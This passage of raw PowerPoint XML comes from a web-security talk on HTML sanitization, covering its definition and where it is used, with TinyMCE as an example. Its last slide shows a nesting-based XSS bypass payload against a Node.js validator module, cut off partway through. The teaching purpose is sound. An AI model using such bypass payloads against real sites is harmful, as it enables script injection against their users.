                  <a:cubicBezTo>
                    <a:pt x="5615" y="21179"/>
                    <a:pt x="5615" y="21179"/>
                    <a:pt x="5615" y="21179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6244" y="21179"/>
                    <a:pt x="6985" y="20550"/>
                    <a:pt x="7209" y="19787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7344" y="19360"/>
                    <a:pt x="7344" y="19360"/>
                    <a:pt x="7344" y="19360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7412" y="19158"/>
                    <a:pt x="7434" y="18979"/>
                    <a:pt x="7434" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7456" y="18799"/>
                    <a:pt x="7456" y="18799"/>
                    <a:pt x="7456" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7456" y="17743"/>
                    <a:pt x="7456" y="17743"/>
                    <a:pt x="7456" y="17743"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7456" y="17563"/>
                    <a:pt x="7546" y="17429"/>
                    <a:pt x="7680" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7928" y="17429"/>
                    <a:pt x="7928" y="17429"/>
                    <a:pt x="7928" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8444" y="17429"/>
                    <a:pt x="8849" y="16575"/>
                    <a:pt x="8849" y="15722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8849" y="14105"/>
                    <a:pt x="8849" y="14105"/>
                    <a:pt x="8849" y="14105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8849" y="13656"/>
                    <a:pt x="8444" y="13273"/>
                    <a:pt x="7928" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7726" y="13273"/>
                    <a:pt x="7726" y="13273"/>
                    <a:pt x="7726" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7816" y="13139"/>
                    <a:pt x="7883" y="12959"/>
                    <a:pt x="7883" y="12780"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7905" y="12510"/>
                    <a:pt x="7905" y="12308"/>
                    <a:pt x="7905" y="12129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7928" y="11993"/>
                    <a:pt x="7928" y="11904"/>
                    <a:pt x="7951" y="11814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7995" y="11679"/>
                    <a:pt x="8017" y="11590"/>
                    <a:pt x="8107" y="11477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8220" y="11365"/>
                    <a:pt x="8377" y="11207"/>
                    <a:pt x="8714" y="11050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9231" y="10781"/>
                    <a:pt x="9432" y="10151"/>
                    <a:pt x="9163" y="9635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8894" y="9119"/>
                    <a:pt x="8265" y="8894"/>
                    <a:pt x="7748" y="9164"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10421" y="6266"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10421" y="6266"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10061" y="5727"/>
                    <a:pt x="9253" y="5547"/>
                    <a:pt x="8669" y="5884"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1034" y="8917"/>
                    <a:pt x="1034" y="8917"/>
                    <a:pt x="1034" y="8917"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427" y="9231"/>
                    <a:pt x="225" y="9949"/>
                    <a:pt x="607" y="10488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="854" y="10871"/>
                    <a:pt x="1303" y="11050"/>
                    <a:pt x="1752" y="11050"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1752" y="11050"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1932" y="11050"/>
                    <a:pt x="2134" y="11073"/>
                    <a:pt x="2291" y="11117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2426" y="11163"/>
                    <a:pt x="2538" y="11207"/>
                    <a:pt x="2628" y="11252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2763" y="11365"/>
                    <a:pt x="2875" y="11454"/>
                    <a:pt x="2987" y="11679"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3077" y="11881"/>
                    <a:pt x="3167" y="12195"/>
                    <a:pt x="3167" y="12712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5278" y="12712"/>
                    <a:pt x="5278" y="12712"/>
                    <a:pt x="5278" y="12712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5278" y="12039"/>
                    <a:pt x="5166" y="11454"/>
                    <a:pt x="4963" y="10938"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4829" y="10601"/>
                    <a:pt x="4627" y="10309"/>
                    <a:pt x="4424" y="10062"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9994" y="7839"/>
                    <a:pt x="9994" y="7839"/>
                    <a:pt x="9994" y="7839"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10600" y="7502"/>
                    <a:pt x="10780" y="6805"/>
                    <a:pt x="10421" y="6266"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2134" y="7681"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2134" y="7681"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9770" y="4649"/>
                    <a:pt x="9770" y="4649"/>
                    <a:pt x="9770" y="4649"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10376" y="4313"/>
                    <a:pt x="10556" y="3616"/>
                    <a:pt x="10196" y="3077"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9837" y="2516"/>
                    <a:pt x="9029" y="2358"/>
                    <a:pt x="8444" y="2672"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="809" y="5727"/>
                    <a:pt x="809" y="5727"/>
                    <a:pt x="809" y="5727"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="6042"/>
                    <a:pt x="0" y="6761"/>
                    <a:pt x="360" y="7300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="741" y="7839"/>
                    <a:pt x="1527" y="8018"/>
                    <a:pt x="2134" y="7681"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2134" y="4357"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2134" y="4357"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7546" y="2291"/>
                    <a:pt x="7546" y="2291"/>
                    <a:pt x="7546" y="2291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8153" y="1977"/>
                    <a:pt x="8355" y="1258"/>
                    <a:pt x="7995" y="719"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7614" y="180"/>
                    <a:pt x="6827" y="0"/>
                    <a:pt x="6221" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="809" y="2403"/>
                    <a:pt x="809" y="2403"/>
                    <a:pt x="809" y="2403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="2740"/>
                    <a:pt x="0" y="3436"/>
                    <a:pt x="360" y="3976"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="741" y="4515"/>
                    <a:pt x="1527" y="4694"/>
                    <a:pt x="2134" y="4357"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2042000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HTML sanitation?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML sanitization takes markup as input, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>outputs "safe" markup </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Different from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URLEncoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTMLEncoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>will not help you here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML sanitization is everywhere</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1652542" y="3493612"/>
            <a:ext cx="2493892" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Advertisements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4481505" y="3955277"/>
            <a:ext cx="2065589" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Outlook.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="DB3D16"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575000" y="4588693"/>
            <a:ext cx="6230309" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript-based Windows 8 Store Apps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3690155" y="3031947"/>
            <a:ext cx="4300276" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Forum Posts w/Markup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4037895" y="5356257"/>
            <a:ext cx="4194478" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TinyMCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CKEditor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Widgets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1336543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10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="5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P spid="9"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1521174"/>
            <a:ext cx="6995530" cy="3636204"/>
            <a:chOff x="457200" y="1280302"/>
            <a:chExt cx="6995530" cy="3636204"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1280302"/>
              <a:ext cx="6995530" cy="3636204"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:noFill/>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="304800" algn="tl"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descr="Screen Shot 2013-02-21 at 3.40.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88" y="1367894"/>
              <a:ext cx="6647806" cy="3526065"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="522888" y="1352505"/>
              <a:ext cx="6790125" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>This example displays all plugins and buttons that come with the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>TinyMCE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> package.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="270320"/>
            <a:ext cx="8229600" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1691270" y="3667353"/>
            <a:ext cx="6995530" cy="3190647"/>
            <a:chOff x="1806357" y="2999947"/>
            <a:chExt cx="6995530" cy="3190647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1806357" y="2999947"/>
              <a:ext cx="6995530" cy="3190647"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:noFill/>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="304800" algn="tl"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descr="Screen Shot 2013-02-21 at 3.59.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733" y="3223401"/>
              <a:ext cx="6757067" cy="2967193"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1929733" y="3135206"/>
              <a:ext cx="6757067" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Source output from post</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="927636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1271519"/>
            <a:ext cx="8686800" cy="2100575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="9144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a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitizer Bypass in validator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Node.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Module by @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>NealPoole</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>t.co</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/5omk5ec2UD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Nesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Input: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>scrRedirecRedirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> 302t 302ipt type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"&gt;prompt(1);&lt;/</a:t>
            </a:r>
            <a:r>
